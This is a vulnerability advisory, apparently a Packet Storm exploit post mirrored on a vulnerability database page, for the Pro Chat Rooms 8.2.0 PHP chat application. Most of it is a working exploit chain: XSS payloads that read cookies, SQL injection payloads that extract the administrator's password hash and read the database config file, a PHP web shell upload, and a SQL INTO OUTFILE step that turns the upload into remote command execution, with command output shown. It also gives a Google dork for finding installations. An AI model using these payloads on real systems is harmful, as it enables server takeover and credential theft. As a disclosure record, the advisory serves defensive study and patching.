Lucene search
K

Pro Chat Rooms 8.2.0 XSS / Shell Upload / SQL Injection

🗓️ 06 Aug 2014 00:00:00Reported by Mike ManzottiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 30 Views

Pro Chat Rooms v8.2.0 Multiple Vulnerabilities including Stored XSS, Reflected XSS, SQL Injection, and Arbitrary File Uploa

Code
`# Exploit Title: Pro Chat Rooms v8.2.0 - Multiple Vulnerabilities  
# Google Dork: intitle:"Powered by Pro Chat Rooms"  
# Date: 5 August 2014  
# Exploit Author: Mike Manzotti @ Dionach Ltd  
# Vendor Homepage: http://prochatrooms.com   
# Software Link: http://prochatrooms.com/software.php   
# Version: v8.2.0  
# Tested on: Debian (Apache+MySQL)  
  
1) Stored XSS  
=============  
  
Text Chat Room Software of ProoChatRooms is vulnerable to Stored XSS. After registered an account, an attacker can upload a profile picture containing Javascript code as shown below:  
  
POST: http://<WEBSITE>/prochatrooms/profiles/index.php?id=1   
Content-Disposition: form-data; name="uploadedfile"; filename="nopic333.jpg"  
Content-Type: image/jpeg  
  
<script>alert(document.cookie)</script>  
  
By inspecting the response, the web application returns a 32 digits value in the HTML tag "imgID" as shown below:  
  
Response:  
<input type="hidden" name="imgID" value="798ae9b06cd900b95ed5a60e02419d4b">  
  
The picture is uploaded under the directory "/profiles/uploads" and is accessible by force browsing to the 32 digits value as shown below:  
  
http://<WEBSITE>/prochatrooms/profiles/uploads/798ae9b06cd900b95ed5a60e02419d4b   
  
Image  
  
  
  
2) Reflected XSS  
=============  
  
Text Chat Room Software of ProoChatRooms is vulnerable to Reflected XSS. The parameter "edit" is not encoded:  
  
http://<WEBSITE>/prochatrooms/profiles/index.php?id=1&edit="><script>alert(document.cookie)</script>   
  
  
  
3) SQL Injection  
================  
  
Text Chat Room Software of ProoChatRooms is vulnerable to SQL injections. Across the all source code of web application, parameterized queries are used to query the database. However, a lack of data sanitization of three parameters leaves the web application vulnerable to SQLi. The vulnerable parameters are located as shown below:  
  
prochatrooms_v8.2.0/includes/functions.php: ~2437  
$params = array(  
'password' => md5($password),  
'email' => makeSafe($email),  
'id' => $id  
);  
$query = "UPDATE prochatrooms_users   
SET email = '".$email."',   
password='".md5($password)."'   
WHERE id = '".$id."'  
";  
  
prochatrooms_v8.2.0/includes/functions.php: ~2449  
$query = "UPDATE prochatrooms_users   
SET email = '".$email."'  
WHERE id = '".$id."'  
";   
  
prochatrooms_v8.2.0/includes/functions.php: ~3110  
$query = "UPDATE prochatrooms_users   
SET active = '".$offlineTime."', online = '0'   
WHERE username = '".makeSafe($toname)."'  
";  
  
Note that the “makeSafe” function is defined as shown below and will protect against XSS attacks only:  
  
prochatrooms_v8.2.0/includes/functions.php: ~125  
function makeSafe($data)  
{  
$data = htmlspecialchars($data);  
  
return $data;  
}  
  
  
After registering an account, an attacker can exploit the SQL injection by editing the field email as shown below which will retrieve the MD5 hashed password of the administrator:  
  
POST http://<WEBSITE>/prochatrooms/profiles/index.php?id=1   
Content-Disposition: form-data; name="profileEmail"  
  
[email protected]', email=(select adminLogin from prochatrooms_config) where id ='1';#  
  
  
The following SQL injection will retrieve the SQL connection string, which probably has clear-text database credentials.  
  
POST http://<WEBSITE>/prochatrooms/profiles/index.php?id=1   
Content-Disposition: form-data; name="profileEmail"  
  
[email protected]', email=(select load_file('/var/www/prochatrooms/includes/db.php')) where id ='1';#  
  
  
  
  
4) Arbitrary File Upload   
=========================  
  
It is possible to combine the Stored XSS and SQL injection vulnerabilities to upload a web shell on the server.   
  
The following request will upload a PHP web shell and the web application will return a 32 digit value.  
  
POST: http://<WEBSITE>/prochatrooms/profiles/index.php?id=1   
Content-Disposition: form-data; name="uploadedfile"; filename="m.jpg"  
Content-Type: application/octet-stream  
  
<?php system($_GET[cmd]);?>  
  
Response:  
<input type="hidden" name="imgID" value="82d0635538da4eac42da25f8f95f8c45">  
  
Since the uploaded web shell is without extension it will not be executed:  
  
http://<WEBSITE>/prochatrooms/profiles/uploads/82d0635538da4eac42da25f8f95f8c45  
<?php system($_GET[cmd]);?>  
  
Image:  
  
  
However, exploiting the SQL injection it is possible to rename the file by appending a .php extension  
  
POST http://<WEBSITE>/prochatrooms/profiles/index.php?id=1   
Content-Disposition: form-data; name="profileEmail"  
  
[email protected]' where id ='1'; SELECT load_file('/var/www/prochatrooms/profiles/uploads/82d0635538da4eac42da25f8f95f8c45') INTO OUTFILE '/var/www/prochatrooms/profiles/uploads/s.php';#  
  
Web shell:  
http://<WEBSITE>/prochatrooms/profiles/uploads/s.php?cmd=id  
uid=33(www-data) gid=33(www-data) groups=33(www-data)  
  
Image:  
  
  
  
Timeline  
========  
19/07/2014: Vendor informed via email  
04/08/2014: Vendor informed via email  
05/08/2014: Public Disclosure  
  
Kind regards,  
Mike  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation